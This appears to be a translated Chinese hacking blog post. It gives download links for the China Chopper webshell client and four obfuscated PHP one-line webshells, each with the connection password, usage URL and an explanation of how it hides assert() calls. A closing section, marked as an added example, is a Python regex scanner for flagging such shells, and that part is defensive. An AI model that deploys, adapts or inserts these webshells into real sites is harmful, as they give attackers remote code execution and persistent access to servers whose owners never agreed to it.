China Chopper ("Chinese kitchen knife") download: optimized version 20160309, based on the original China Chopper.
Download link:
http://pan.baidu.com/s/1jHoJxHW
China Chopper
http://pan.baidu.com/s/1eRxEYjC
The following are various one-sentence Trojans (one-line webshells), collected and organized, with how to use each:
1.php
<?php $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['joker']); ?>
Usage: http://www.xxx.com/1.php
China Chopper connection usage: http://www.xxx.com/1.php
Password: joker
Detailed explanation: assert is a PHP code-execution function that serves the same purpose as eval(). $POST is appended to the $array array, so $array[0]['POST'] evaluates to assert, which forms the one-sentence Trojan
assert($_POST['joker']). Connect to it directly with China Chopper.
————————————————————————————————————————————————————————
2.php
<?php error_reporting(0); $g = array('','s'); $gg = a.$g[1].ser.chr('116'); @$gg($_POST[joker]); ?>
Usage: http://www.xxx.com/2.php
China Chopper connection usage: http://www.xxx.com/2.php
Password: joker
Detailed explanation: $g is an array with $g[1]='s', and chr('116')='t' (ASCII code table: https://blog.csdn.net/yabingshi_tech/article/details/19833217), so $gg = assert.
@$gg($_POST[joker]) is therefore simply assert($_POST[joker]), the common one-sentence Trojan. Connect to it directly with China Chopper.
————————————————————————————————————————————————————————
3.php (array_filter+base64_decode)
<?php error_reporting(0); $e=$_REQUEST['e']; $arr=array($_POST['joker'],); array_filter($arr,base64_decode($e)); ?>
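Usage: http://www.xxx.com/3.php?e=YXNzZXJ0
Submit via POST from the browser: joker=phpinfo();
China Chopper connection usage: http://www.xxx.com/3.php?e=YXNzZXJ0
Password: joker
Detailed explanation: YXNzZXJ0 base64-decodes to assert. $e receives the parameter sent by the browser, and $arr is an array. The array_filter() function filters the values of an array using a callback function,
so if the value we pass in $e is YXNzZXJ0, the callback function name is assert, and it is applied to every element of the array.
This forms assert($_POST['joker']), the common one-sentence Trojan. Connect to it directly with China Chopper.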
——————————————————————————————————————————————————————————
4.php
<?php error_reporting(0); call_user_func('assert', $_REQUEST['joker']); ?>
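Usage: http://www.xxx.com/4.php
China Chopper connection usage: http://www.xxx.com/4.php
Password: joker
Detailed explanation: call_user_func() calls its first argument as a callback function, so assert is the callback being invoked, and the remaining arguments are passed to it as its parameters.
This directly forms the one-sentence Trojan assert($_REQUEST['joker']). Connect to it directly with China Chopper.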
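
Seen from the defending side, all four samples share one shape: request data reaches a call whose target is only chosen at run time. The Python heuristic below is an added example, not part of the original post; the rule names, the scan() function and the benign sample are constructed for illustration.

```python
import re

# Heuristic only: statements are split on ";" and taint is tracked by variable name.
SUPERGLOBAL = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
ASSIGNMENT = re.compile(r"^@?(\$\w+)(?:\s*\[[^\]]*\])*\s*=(?!=)(.*)$", re.S)
SINKS = {
    # $f(...) or $a[0]['k'](...): callee name computed at run time (1.php, 2.php).
    "variable-function-call": re.compile(r"\$\w+(?:\s*\[[^\]]*\])*\s*\("),
    # Builtins that call a function named by one of their arguments (3.php, 4.php).
    "callback-builtin": re.compile(
        r"\b(?:call_user_func(?:_array)?|array_filter|array_map|usort)\s*\(", re.I),
    # The plain form that every sample on the page reduces to.
    "direct-eval-or-assert": re.compile(r"\b(?:eval|assert)\s*\(", re.I),
}

def scan(php_source):
    """Return [(rule, statement)] where request data reaches a code-execution sink."""
    tainted, findings = set(), []

    def is_tainted(text):
        return bool(SUPERGLOBAL.search(text)) or any(
            re.search(re.escape(v) + r"\b", text) for v in tainted)

    body = re.sub(r"<\?php|\?>", "", php_source)
    for stmt in (s.strip() for s in body.split(";")):
        if is_tainted(stmt):
            findings += [(rule, stmt) for rule, rx in SINKS.items() if rx.search(stmt)]
        m = ASSIGNMENT.match(stmt)
        if m and is_tainted(m.group(2)):  # e.g. $e=$_REQUEST['e'] taints $e
            tainted.add(m.group(1))
    return findings

# The four samples from this page plus a constructed benign script.
SAMPLES = {
    "1.php": r"<?php $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['joker']); ?>",
    "2.php": r"<?php error_reporting(0); $g = array('','s'); $gg = a.$g[1].ser.chr('116'); @$gg($_POST[joker]); ?>",
    "3.php": r"<?php error_reporting(0); $e=$_REQUEST['e']; $arr=array($_POST['joker'],); array_filter($arr,base64_decode($e)); ?>",
    "4.php": r"<?php error_reporting(0); call_user_func('assert', $_REQUEST['joker']); ?>",
    "benign.php": r"<?php $name = $_POST['name']; echo htmlspecialchars($name); $n = array_filter($list, 'is_numeric'); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, sorted({rule for rule, _ in scan(src)}) or "clean")
```

Hits are triage leads for manual review, since legitimate code can also pass user input to callback-taking functions.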